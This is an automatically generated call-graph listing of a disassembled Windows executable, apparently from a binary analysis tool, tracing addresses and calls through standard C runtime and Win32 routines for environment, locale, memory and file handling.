19642 7ff6fb20270e 19641->19642 19643 7ff6fb20272b 19641->19643 19642->19643 19645 7ff6fb20271c 19642->19645 19644 7ff6fb202735 19643->19644 19980 7ff6fb206f48 19643->19980 19987 7ff6fb206f84 19644->19987 19647 7ff6fb1f43f4 _get_daylight 11 API calls 19645->19647 19649 7ff6fb202721 memcpy_s 19647->19649 19649->19492 19651 7ff6fb1f4178 45 API calls 19650->19651 19652 7ff6fb2065ba 19651->19652 19653 7ff6fb2065c8 19652->19653 19999 7ff6fb1fe234 19652->19999 20002 7ff6fb1f47bc 19653->20002 19657 7ff6fb2066b4 19660 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19657->19660 19662 7ff6fb2066c5 19657->19662 19658 7ff6fb1f4178 45 API calls 19659 7ff6fb206637 
19658->19659 19663 7ff6fb1fe234 5 API calls 19659->19663 19666 7ff6fb206640 19659->19666 19660->19662 19661 7ff6fb1ffeb3 19661->19514 19661->19515 19662->19661 19664 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19662->19664 19663->19666 19664->19661 19665 7ff6fb1f47bc 14 API calls 19667 7ff6fb20669b 19665->19667 19666->19665 19667->19657 19668 7ff6fb2066a3 SetEnvironmentVariableW 19667->19668 19668->19657 19670 7ff6fb20039f 19669->19670 19671 7ff6fb2003bc 19669->19671 19670->19527 19672 7ff6fb1fdea8 _get_daylight 11 API calls 19671->19672 19679 7ff6fb2003e0 19672->19679 19673 7ff6fb200464 19675 7ff6fb1f9814 __GetCurrentState 45 API calls 19673->19675 19674 7ff6fb200441 19677 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19674->19677 19676 7ff6fb20046a 19675->19676 19677->19670 19678 7ff6fb1fdea8 _get_daylight 11 API calls 19678->19679 19679->19673 19679->19674 19679->19678 19680 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19679->19680 19681 7ff6fb1ff784 37 API calls 19679->19681 19682 7ff6fb200450 19679->19682 19680->19679 19681->19679 19683 7ff6fb1f9c10 _isindst 17 API calls 19682->19683 19683->19673 19685 7ff6fb1f8a24 19684->19685 19688 7ff6fb1f8a2d 19684->19688 19685->19688 20024 7ff6fb1f8524 19685->20024 19688->19542 19688->19543 19691 7ff6fb206309 19690->19691 19694 7ff6fb206336 19690->19694 19692 7ff6fb20630e 19691->19692 19691->19694 19693 7ff6fb1f43f4 _get_daylight 11 API calls 19692->19693 19696 7ff6fb206313 19693->19696 19695 7ff6fb20637a 19694->19695 19698 7ff6fb206399 19694->19698 19712 7ff6fb20636e __crtLCMapStringW 19694->19712 19697 7ff6fb1f43f4 _get_daylight 11 API calls 19695->19697 19699 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19696->19699 19700 7ff6fb20637f 19697->19700 19701 7ff6fb2063b5 19698->19701 19702 7ff6fb2063a3 19698->19702 19703 7ff6fb20631e 19699->19703 19705 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19700->19705 19704 
7ff6fb1f4178 45 API calls 19701->19704 19706 7ff6fb1f43f4 _get_daylight 11 API calls 19702->19706 19703->19536 19707 7ff6fb2063c2 19704->19707 19705->19712 19708 7ff6fb2063a8 19706->19708 19707->19712 20071 7ff6fb207e18 19707->20071 19709 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19708->19709 19709->19712 19712->19536 19713 7ff6fb1f43f4 _get_daylight 11 API calls 19713->19712 19715 7ff6fb1f84c9 19714->19715 19724 7ff6fb1f84c5 19714->19724 19737 7ff6fb201900 19715->19737 19720 7ff6fb1f84db 19722 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19720->19722 19721 7ff6fb1f84e7 19763 7ff6fb1f8594 19721->19763 19722->19724 19724->19603 19729 7ff6fb1f8804 19724->19729 19726 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19727 7ff6fb1f850e 19726->19727 19728 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19727->19728 19728->19724 19730 7ff6fb1f882d 19729->19730 19731 7ff6fb1f8846 19729->19731 19730->19603 19731->19730 19732 7ff6fb1fdea8 _get_daylight 11 API calls 19731->19732 19733 7ff6fb1f88d6 19731->19733 19734 7ff6fb1ffaf8 WideCharToMultiByte 19731->19734 19736 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19731->19736 19732->19731 19735 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19733->19735 19734->19731 19735->19730 19736->19731 19738 7ff6fb20190d 19737->19738 19739 7ff6fb1f84ce 19737->19739 19782 7ff6fb1fa534 19738->19782 19743 7ff6fb201c3c GetEnvironmentStringsW 19739->19743 19744 7ff6fb1f84d3 19743->19744 19745 7ff6fb201c6c 19743->19745 19744->19720 19744->19721 19746 7ff6fb1ffaf8 WideCharToMultiByte 19745->19746 19748 7ff6fb201cbd 19746->19748 19747 7ff6fb201cc4 FreeEnvironmentStringsW 19747->19744 19748->19747 19749 7ff6fb1fc90c _fread_nolock 12 API calls 19748->19749 19750 7ff6fb201cd7 19749->19750 19751 7ff6fb201cdf 19750->19751 19752 7ff6fb201ce8 19750->19752 19753 7ff6fb1f9c58 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19751->19753 19754 7ff6fb1ffaf8 WideCharToMultiByte 19752->19754 19755 7ff6fb201ce6 19753->19755 19756 7ff6fb201d0b 19754->19756 19755->19747 19757 7ff6fb201d0f 19756->19757 19758 7ff6fb201d19 19756->19758 19759 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19757->19759 19760 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19758->19760 19761 7ff6fb201d17 FreeEnvironmentStringsW 19759->19761 19760->19761 19761->19744 19764 7ff6fb1f85b9 19763->19764 19765 7ff6fb1fdea8 _get_daylight 11 API calls 19764->19765 19778 7ff6fb1f85ef 19765->19778 19766 7ff6fb1f85f7 19767 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19766->19767 19768 7ff6fb1f84ef 19767->19768 19768->19726 19769 7ff6fb1f866a 19770 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19769->19770 19770->19768 19771 7ff6fb1fdea8 _get_daylight 11 API calls 19771->19778 19772 7ff6fb1f8659 19773 7ff6fb1f87c0 11 API calls 19772->19773 19775 7ff6fb1f8661 19773->19775 19774 7ff6fb1f97b4 __std_exception_copy 37 API calls 19774->19778 19776 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19775->19776 19776->19766 19777 7ff6fb1f868f 19779 7ff6fb1f9c10 _isindst 17 API calls 19777->19779 19778->19766 19778->19769 19778->19771 19778->19772 19778->19774 19778->19777 19780 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19778->19780 19781 7ff6fb1f86a2 19779->19781 19780->19778 19783 7ff6fb1fa545 FlsGetValue 19782->19783 19784 7ff6fb1fa560 FlsSetValue 19782->19784 19785 7ff6fb1fa552 19783->19785 19786 7ff6fb1fa55a 19783->19786 19784->19785 19787 7ff6fb1fa56d 19784->19787 19788 7ff6fb1f9814 __GetCurrentState 45 API calls 19785->19788 19790 7ff6fb1fa558 19785->19790 19786->19784 19789 7ff6fb1fdea8 _get_daylight 11 API calls 19787->19789 19791 7ff6fb1fa5d5 19788->19791 19792 7ff6fb1fa57c 19789->19792 19802 
7ff6fb2015d4 19790->19802 19793 7ff6fb1fa59a FlsSetValue 19792->19793 19794 7ff6fb1fa58a FlsSetValue 19792->19794 19795 7ff6fb1fa5b8 19793->19795 19796 7ff6fb1fa5a6 FlsSetValue 19793->19796 19797 7ff6fb1fa593 19794->19797 19798 7ff6fb1fa204 _get_daylight 11 API calls 19795->19798 19796->19797 19799 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19797->19799 19800 7ff6fb1fa5c0 19798->19800 19799->19785 19801 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19800->19801 19801->19790 19825 7ff6fb201844 19802->19825 19804 7ff6fb201609 19840 7ff6fb2012d4 19804->19840 19807 7ff6fb201626 19807->19739 19808 7ff6fb1fc90c _fread_nolock 12 API calls 19809 7ff6fb201637 19808->19809 19810 7ff6fb20163f 19809->19810 19812 7ff6fb20164e 19809->19812 19811 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19810->19811 19811->19807 19812->19812 19847 7ff6fb20197c 19812->19847 19815 7ff6fb20174a 19816 7ff6fb1f43f4 _get_daylight 11 API calls 19815->19816 19817 7ff6fb20174f 19816->19817 19819 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19817->19819 19818 7ff6fb2017a5 19821 7ff6fb20180c 19818->19821 19858 7ff6fb201104 19818->19858 19819->19807 19820 7ff6fb201764 19820->19818 19823 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19820->19823 19822 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19821->19822 19822->19807 19823->19818 19826 7ff6fb201867 19825->19826 19827 7ff6fb201871 19826->19827 19873 7ff6fb1ff5e8 EnterCriticalSection 19826->19873 19830 7ff6fb2018e3 19827->19830 19833 7ff6fb1f9814 __GetCurrentState 45 API calls 19827->19833 19830->19804 19834 7ff6fb2018fb 19833->19834 19836 7ff6fb201952 19834->19836 19837 7ff6fb1fa534 50 API calls 19834->19837 19836->19804 19838 7ff6fb20193c 19837->19838 19839 7ff6fb2015d4 65 API calls 19838->19839 19839->19836 19841 7ff6fb1f4178 45 API calls 19840->19841 19842 7ff6fb2012e8 
19841->19842 19843 7ff6fb2012f4 GetOEMCP 19842->19843 19844 7ff6fb201306 19842->19844 19846 7ff6fb20131b 19843->19846 19845 7ff6fb20130b GetACP 19844->19845 19844->19846 19845->19846 19846->19807 19846->19808 19848 7ff6fb2012d4 47 API calls 19847->19848 19849 7ff6fb2019a9 19848->19849 19850 7ff6fb201aff 19849->19850 19851 7ff6fb2019e6 IsValidCodePage 19849->19851 19857 7ff6fb201a00 memcpy_s 19849->19857 19852 7ff6fb1eb870 _log10_special 8 API calls 19850->19852 19851->19850 19853 7ff6fb2019f7 19851->19853 19854 7ff6fb201741 19852->19854 19855 7ff6fb201a26 GetCPInfo 19853->19855 19853->19857 19854->19815 19854->19820 19855->19850 19855->19857 19874 7ff6fb2013ec 19857->19874 19930 7ff6fb1ff5e8 EnterCriticalSection 19858->19930 19875 7ff6fb201429 GetCPInfo 19874->19875 19876 7ff6fb20151f 19874->19876 19875->19876 19881 7ff6fb20143c 19875->19881 19877 7ff6fb1eb870 _log10_special 8 API calls 19876->19877 19879 7ff6fb2015be 19877->19879 19878 7ff6fb202150 48 API calls 19880 7ff6fb2014b3 19878->19880 19879->19850 19885 7ff6fb206e94 19880->19885 19881->19878 19884 7ff6fb206e94 54 API calls 19884->19876 19886 7ff6fb1f4178 45 API calls 19885->19886 19887 7ff6fb206eb9 19886->19887 19890 7ff6fb206b60 19887->19890 19891 7ff6fb206ba1 19890->19891 19892 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 19891->19892 19896 7ff6fb206beb 19892->19896 19893 7ff6fb206e69 19894 7ff6fb1eb870 _log10_special 8 API calls 19893->19894 19895 7ff6fb2014e6 19894->19895 19895->19884 19896->19893 19897 7ff6fb1fc90c _fread_nolock 12 API calls 19896->19897 19898 7ff6fb206d21 19896->19898 19899 7ff6fb206c23 19896->19899 19897->19899 19898->19893 19900 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19898->19900 19899->19898 19901 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 19899->19901 19900->19893 19902 7ff6fb206c96 19901->19902 19902->19898 19921 7ff6fb1fe3f4 19902->19921 19905 7ff6fb206d32 19908 7ff6fb1fc90c _fread_nolock 12 API calls 19905->19908 19909 7ff6fb206e04 
19905->19909 19911 7ff6fb206d50 19905->19911 19906 7ff6fb206ce1 19906->19898 19907 7ff6fb1fe3f4 __crtLCMapStringW 6 API calls 19906->19907 19907->19898 19908->19911 19909->19898 19910 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19909->19910 19910->19898 19911->19898 19912 7ff6fb1fe3f4 __crtLCMapStringW 6 API calls 19911->19912 19913 7ff6fb206dd0 19912->19913 19913->19909 19914 7ff6fb206df0 19913->19914 19915 7ff6fb206e06 19913->19915 19916 7ff6fb1ffaf8 WideCharToMultiByte 19914->19916 19917 7ff6fb1ffaf8 WideCharToMultiByte 19915->19917 19918 7ff6fb206dfe 19916->19918 19917->19918 19918->19909 19919 7ff6fb206e1e 19918->19919 19919->19898 19920 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19919->19920 19920->19898 19922 7ff6fb1fe020 __crtLCMapStringW 5 API calls 19921->19922 19923 7ff6fb1fe432 19922->19923 19926 7ff6fb1fe43a 19923->19926 19927 7ff6fb1fe4e0 19923->19927 19925 7ff6fb1fe4a3 LCMapStringW 19925->19926 19926->19898 19926->19905 19926->19906 19928 7ff6fb1fe020 __crtLCMapStringW 5 API calls 19927->19928 19929 7ff6fb1fe50e __crtLCMapStringW 19928->19929 19929->19925 19932 7ff6fb2055d1 19931->19932 19933 7ff6fb2055e8 19931->19933 19934 7ff6fb1f43f4 _get_daylight 11 API calls 19932->19934 19933->19932 19935 7ff6fb2055f6 19933->19935 19936 7ff6fb2055d6 19934->19936 19938 7ff6fb1f4178 45 API calls 19935->19938 19939 7ff6fb2055e1 19935->19939 19937 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19936->19937 19937->19939 19938->19939 19939->19613 19941 7ff6fb1f4178 45 API calls 19940->19941 19942 7ff6fb208281 19941->19942 19945 7ff6fb207ed8 19942->19945 19948 7ff6fb207f26 19945->19948 19946 7ff6fb1eb870 _log10_special 8 API calls 19947 7ff6fb206515 19946->19947 19947->19613 19947->19640 19949 7ff6fb207fad 19948->19949 19951 7ff6fb207f98 GetCPInfo 19948->19951 19954 7ff6fb207fb1 19948->19954 19950 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 19949->19950 19949->19954 19952 7ff6fb208045 19950->19952 
19951->19949 19951->19954 19953 7ff6fb1fc90c _fread_nolock 12 API calls 19952->19953 19952->19954 19955 7ff6fb20807c 19952->19955 19953->19955 19954->19946 19955->19954 19956 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 19955->19956 19957 7ff6fb2080ea 19956->19957 19958 7ff6fb2081cc 19957->19958 19959 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 19957->19959 19958->19954 19960 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19958->19960 19961 7ff6fb208110 19959->19961 19960->19954 19961->19958 19962 7ff6fb1fc90c _fread_nolock 12 API calls 19961->19962 19963 7ff6fb20813d 19961->19963 19962->19963 19963->19958 19964 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 19963->19964 19965 7ff6fb2081b4 19964->19965 19966 7ff6fb2081ba 19965->19966 19967 7ff6fb2081d4 19965->19967 19966->19958 19970 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19966->19970 19974 7ff6fb1fe278 19967->19974 19970->19958 19971 7ff6fb208213 19971->19954 19973 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19971->19973 19972 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19972->19971 19973->19954 19975 7ff6fb1fe020 __crtLCMapStringW 5 API calls 19974->19975 19976 7ff6fb1fe2b6 19975->19976 19977 7ff6fb1fe2be 19976->19977 19978 7ff6fb1fe4e0 __crtLCMapStringW 5 API calls 19976->19978 19977->19971 19977->19972 19979 7ff6fb1fe327 CompareStringW 19978->19979 19979->19977 19981 7ff6fb206f51 19980->19981 19982 7ff6fb206f6a HeapSize 19980->19982 19983 7ff6fb1f43f4 _get_daylight 11 API calls 19981->19983 19984 7ff6fb206f56 19983->19984 19985 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19984->19985 19986 7ff6fb206f61 19985->19986 19986->19644 19988 7ff6fb206fa3 19987->19988 19989 7ff6fb206f99 19987->19989 19991 7ff6fb206fa8 19988->19991 19997 7ff6fb206faf _get_daylight 19988->19997 19990 7ff6fb1fc90c _fread_nolock 12 API calls 19989->19990 19995 7ff6fb206fa1 19990->19995 19992 7ff6fb1f9c58 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19991->19992 19992->19995 19993 7ff6fb206fb5 19996 7ff6fb1f43f4 _get_daylight 11 API calls 19993->19996 19994 7ff6fb206fe2 HeapReAlloc 19994->19995 19994->19997 19995->19649 19996->19995 19997->19993 19997->19994 19998 7ff6fb2028a0 _get_daylight 2 API calls 19997->19998 19998->19997 20000 7ff6fb1fe020 __crtLCMapStringW 5 API calls 19999->20000 20001 7ff6fb1fe254 20000->20001 20001->19653 20003 7ff6fb1f480a 20002->20003 20004 7ff6fb1f47e6 20002->20004 20005 7ff6fb1f4864 20003->20005 20006 7ff6fb1f480f 20003->20006 20008 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20004->20008 20012 7ff6fb1f47f5 20004->20012 20007 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 20005->20007 20009 7ff6fb1f4824 20006->20009 20006->20012 20013 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20006->20013 20018 7ff6fb1f4880 20007->20018 20008->20012 20010 7ff6fb1fc90c _fread_nolock 12 API calls 20009->20010 20010->20012 20011 7ff6fb1f4887 GetLastError 20014 7ff6fb1f4368 _fread_nolock 11 API calls 20011->20014 20012->19657 20012->19658 20013->20009 20017 7ff6fb1f4894 20014->20017 20015 7ff6fb1f48c2 20015->20012 20016 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 20015->20016 20022 7ff6fb1f4906 20016->20022 20023 7ff6fb1f43f4 _get_daylight 11 API calls 20017->20023 20018->20011 20018->20015 20019 7ff6fb1f48b5 20018->20019 20020 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20018->20020 20021 7ff6fb1fc90c _fread_nolock 12 API calls 20019->20021 20020->20019 20021->20015 20022->20011 20022->20012 20023->20012 20025 7ff6fb1f853d 20024->20025 20032 7ff6fb1f8539 20024->20032 20045 7ff6fb201d4c GetEnvironmentStringsW 20025->20045 20028 7ff6fb1f854a 20030 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20028->20030 20029 7ff6fb1f8556 20052 7ff6fb1f86a4 20029->20052 20030->20032 20032->19688 20037 7ff6fb1f88e4 20032->20037 
20034 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20035 7ff6fb1f857d 20034->20035 20036 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20035->20036 20036->20032 20038 7ff6fb1f8907 20037->20038 20043 7ff6fb1f891e 20037->20043 20038->19688 20039 7ff6fb1febb0 MultiByteToWideChar _fread_nolock 20039->20043 20040 7ff6fb1fdea8 _get_daylight 11 API calls 20040->20043 20041 7ff6fb1f8992 20042 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20041->20042 20042->20038 20043->20038 20043->20039 20043->20040 20043->20041 20044 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20043->20044 20044->20043 20046 7ff6fb1f8542 20045->20046 20047 7ff6fb201d70 20045->20047 20046->20028 20046->20029 20048 7ff6fb1fc90c _fread_nolock 12 API calls 20047->20048 20049 7ff6fb201da7 memcpy_s 20048->20049 20050 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20049->20050 20051 7ff6fb201dc7 FreeEnvironmentStringsW 20050->20051 20051->20046 20053 7ff6fb1f86cc 20052->20053 20054 7ff6fb1fdea8 _get_daylight 11 API calls 20053->20054 20067 7ff6fb1f8707 20054->20067 20055 7ff6fb1f870f 20056 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20055->20056 20057 7ff6fb1f855e 20056->20057 20057->20034 20058 7ff6fb1f8789 20059 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20058->20059 20059->20057 20060 7ff6fb1fdea8 _get_daylight 11 API calls 20060->20067 20061 7ff6fb1f8778 20062 7ff6fb1f87c0 11 API calls 20061->20062 20064 7ff6fb1f8780 20062->20064 20063 7ff6fb1ff784 37 API calls 20063->20067 20065 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20064->20065 20065->20055 20066 7ff6fb1f87ac 20068 7ff6fb1f9c10 _isindst 17 API calls 20066->20068 20067->20055 20067->20058 20067->20060 20067->20061 20067->20063 20067->20066 20069 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API 
calls 20067->20069 20070 7ff6fb1f87be 20068->20070 20069->20067 20073 7ff6fb207e41 __crtLCMapStringW 20071->20073 20072 7ff6fb2063fe 20072->19712 20072->19713 20073->20072 20074 7ff6fb1fe278 6 API calls 20073->20074 20074->20072 20075 7ff6fb209ef3 20076 7ff6fb209f03 20075->20076 20079 7ff6fb1f4788 LeaveCriticalSection 20076->20079 18685 7ff6fb1ebe70 18686 7ff6fb1ebe80 18685->18686 18702 7ff6fb1f8ec0 18686->18702 18688 7ff6fb1ebe8c 18708 7ff6fb1ec168 18688->18708 18690 7ff6fb1ebea4 _RTC_Initialize 18700 7ff6fb1ebef9 18690->18700 18713 7ff6fb1ec318 18690->18713 18691 7ff6fb1ec44c 7 API calls 18692 7ff6fb1ebf25 18691->18692 18694 7ff6fb1ebeb9 18716 7ff6fb1f832c 18694->18716 18700->18691 18701 7ff6fb1ebf15 18700->18701 18703 7ff6fb1f8ed1 18702->18703 18704 7ff6fb1f43f4 _get_daylight 11 API calls 18703->18704 18705 7ff6fb1f8ed9 18703->18705 18706 7ff6fb1f8ee8 18704->18706 18705->18688 18707 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18706->18707 18707->18705 18709 7ff6fb1ec179 18708->18709 18712 7ff6fb1ec17e __scrt_acquire_startup_lock 18708->18712 18710 7ff6fb1ec44c 7 API calls 18709->18710 18709->18712 18711 7ff6fb1ec1f2 18710->18711 18712->18690 18741 7ff6fb1ec2dc 18713->18741 18715 7ff6fb1ec321 18715->18694 18717 7ff6fb1f834c 18716->18717 18718 7ff6fb1ebec5 18716->18718 18719 7ff6fb1f8354 18717->18719 18720 7ff6fb1f836a GetModuleFileNameW 18717->18720 18718->18700 18740 7ff6fb1ec3ec InitializeSListHead 18718->18740 18721 7ff6fb1f43f4 _get_daylight 11 API calls 18719->18721 18724 7ff6fb1f8395 18720->18724 18722 7ff6fb1f8359 18721->18722 18723 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18722->18723 18723->18718 18756 7ff6fb1f82cc 18724->18756 18727 7ff6fb1f83dd 18728 7ff6fb1f43f4 _get_daylight 11 API calls 18727->18728 18729 7ff6fb1f83e2 18728->18729 18730 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18729->18730 18730->18718 18731 7ff6fb1f83f5 18732 7ff6fb1f8417 18731->18732 18734 7ff6fb1f8443 18731->18734 18735 
7ff6fb1f845c 18731->18735 18733 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18732->18733 18733->18718 18736 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18734->18736 18737 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18735->18737 18738 7ff6fb1f844c 18736->18738 18737->18732 18739 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18738->18739 18739->18718 18742 7ff6fb1ec2f6 18741->18742 18744 7ff6fb1ec2ef 18741->18744 18745 7ff6fb1f94fc 18742->18745 18744->18715 18748 7ff6fb1f9138 18745->18748 18755 7ff6fb1ff5e8 EnterCriticalSection 18748->18755 18757 7ff6fb1f82e4 18756->18757 18761 7ff6fb1f831c 18756->18761 18758 7ff6fb1fdea8 _get_daylight 11 API calls 18757->18758 18757->18761 18759 7ff6fb1f8312 18758->18759 18760 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18759->18760 18760->18761 18761->18727 18761->18731 20083 7ff6fb2009c0 20094 7ff6fb2066f4 20083->20094 20095 7ff6fb206701 20094->20095 20096 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20095->20096 20097 7ff6fb20671d 20095->20097 20096->20095 20098 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20097->20098 20099 7ff6fb2009c9 20097->20099 20098->20097 20100 7ff6fb1ff5e8 EnterCriticalSection 20099->20100 18462 7ff6fb1f4938 18463 7ff6fb1f4952 18462->18463 18464 7ff6fb1f496f 18462->18464 18466 7ff6fb1f43d4 _fread_nolock 11 API calls 18463->18466 18464->18463 18465 7ff6fb1f4982 CreateFileW 18464->18465 18467 7ff6fb1f49ec 18465->18467 18468 7ff6fb1f49b6 18465->18468 18469 7ff6fb1f4957 18466->18469 18513 7ff6fb1f4f14 18467->18513 18487 7ff6fb1f4a8c GetFileType 18468->18487 18472 7ff6fb1f43f4 _get_daylight 11 API calls 18469->18472 18475 7ff6fb1f495f 18472->18475 18480 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18475->18480 18476 7ff6fb1f49e1 CloseHandle 18482 7ff6fb1f496a 18476->18482 18477 7ff6fb1f49cb 
CloseHandle 18477->18482 18478 7ff6fb1f49f5 18483 7ff6fb1f4368 _fread_nolock 11 API calls 18478->18483 18479 7ff6fb1f4a20 18534 7ff6fb1f4cd4 18479->18534 18480->18482 18486 7ff6fb1f49ff 18483->18486 18486->18482 18488 7ff6fb1f4ada 18487->18488 18489 7ff6fb1f4b97 18487->18489 18490 7ff6fb1f4b06 GetFileInformationByHandle 18488->18490 18493 7ff6fb1f4e10 21 API calls 18488->18493 18491 7ff6fb1f4bc1 18489->18491 18492 7ff6fb1f4b9f 18489->18492 18494 7ff6fb1f4bb2 GetLastError 18490->18494 18495 7ff6fb1f4b2f 18490->18495 18497 7ff6fb1f4be4 PeekNamedPipe 18491->18497 18512 7ff6fb1f4b82 18491->18512 18492->18494 18496 7ff6fb1f4ba3 18492->18496 18498 7ff6fb1f4af4 18493->18498 18501 7ff6fb1f4368 _fread_nolock 11 API calls 18494->18501 18499 7ff6fb1f4cd4 51 API calls 18495->18499 18500 7ff6fb1f43f4 _get_daylight 11 API calls 18496->18500 18497->18512 18498->18490 18498->18512 18503 7ff6fb1f4b3a 18499->18503 18500->18512 18501->18512 18502 7ff6fb1eb870 _log10_special 8 API calls 18504 7ff6fb1f49c4 18502->18504 18551 7ff6fb1f4c34 18503->18551 18504->18476 18504->18477 18507 7ff6fb1f4c34 10 API calls 18508 7ff6fb1f4b59 18507->18508 18509 7ff6fb1f4c34 10 API calls 18508->18509 18510 7ff6fb1f4b6a 18509->18510 18511 7ff6fb1f43f4 _get_daylight 11 API calls 18510->18511 18510->18512 18511->18512 18512->18502 18514 7ff6fb1f4f4a 18513->18514 18515 7ff6fb1f43f4 _get_daylight 11 API calls 18514->18515 18533 7ff6fb1f4fe2 __std_exception_destroy 18514->18533 18517 7ff6fb1f4f5c 18515->18517 18516 7ff6fb1eb870 _log10_special 8 API calls 18518 7ff6fb1f49f1 18516->18518 18519 7ff6fb1f43f4 _get_daylight 11 API calls 18517->18519 18518->18478 18518->18479 18520 7ff6fb1f4f64 18519->18520 18521 7ff6fb1f7118 45 API calls 18520->18521 18522 7ff6fb1f4f79 18521->18522 18523 7ff6fb1f4f81 18522->18523 18524 7ff6fb1f4f8b 18522->18524 18525 7ff6fb1f43f4 _get_daylight 11 API calls 18523->18525 18526 7ff6fb1f43f4 _get_daylight 11 API calls 18524->18526 18530 7ff6fb1f4f86 18525->18530 18527 7ff6fb1f4f90 
18526->18527 18528 7ff6fb1f43f4 _get_daylight 11 API calls 18527->18528 18527->18533 18529 7ff6fb1f4f9a 18528->18529 18531 7ff6fb1f7118 45 API calls 18529->18531 18532 7ff6fb1f4fd4 GetDriveTypeW 18530->18532 18530->18533 18531->18530 18532->18533 18533->18516 18535 7ff6fb1f4cfc 18534->18535 18543 7ff6fb1f4a2d 18535->18543 18558 7ff6fb1fea34 18535->18558 18537 7ff6fb1f4d90 18538 7ff6fb1fea34 51 API calls 18537->18538 18537->18543 18539 7ff6fb1f4da3 18538->18539 18540 7ff6fb1fea34 51 API calls 18539->18540 18539->18543 18541 7ff6fb1f4db6 18540->18541 18542 7ff6fb1fea34 51 API calls 18541->18542 18541->18543 18542->18543 18544 7ff6fb1f4e10 18543->18544 18545 7ff6fb1f4e2a 18544->18545 18546 7ff6fb1f4e61 18545->18546 18547 7ff6fb1f4e3a 18545->18547 18548 7ff6fb1fe8c8 21 API calls 18546->18548 18549 7ff6fb1f4368 _fread_nolock 11 API calls 18547->18549 18550 7ff6fb1f4e4a 18547->18550 18548->18550 18549->18550 18550->18486 18552 7ff6fb1f4c50 18551->18552 18553 7ff6fb1f4c5d FileTimeToSystemTime 18551->18553 18552->18553 18555 7ff6fb1f4c58 